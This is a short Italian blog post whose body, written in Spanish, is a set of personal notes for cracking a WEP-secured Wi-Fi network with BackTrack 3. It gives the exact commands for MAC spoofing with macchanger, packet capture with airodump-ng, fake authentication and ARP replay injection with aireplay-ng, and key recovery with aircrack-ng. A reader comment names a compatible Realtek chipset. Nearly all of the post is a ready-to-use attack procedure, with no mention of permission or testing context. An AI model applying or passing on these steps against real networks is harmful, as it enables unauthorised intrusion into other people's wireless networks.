Appunti BT3

Classico file .txt che si perde e casini vari, sfrutto il blog come appunto online… Grazie Timon per la guida ;)

TODO EN SHELL:

EN UNA VENTANA DE SHELL ESCRIBES:

ifconfig wlan0 down
macchanger –mac=00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airodump-ng wlan0

CON AIRODUMP VEAS LAS INFORMACIONES DE LAS REDES

Cierra la ventana anterior antes de empezar los siguientes comandos.

A PARTIRE DE AQUI CADA COMANDOS VAN EN VENTANAS DISTINTAS, mantenlas abiertas:

airodump-ng -c <cannel> -b <BSSID> -w file.ivs wlan0
aireplay-ng -1 0 -e <SSID> -a <BSSID> -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 wlan0
aircrack-ng file.ivs-01.cap

TIENE QUE COGER POR LOS MENOS 40′000 ‘IVS’ PARA ENCONTRAR LA LLAVE DE LA RED

Una Risposta a “Appunti BT3”

  1. Aggiungerei che gli appunti funzionano perfettamente con chipset realtek RTL8187…con altri non so… :-)

Lascia un commento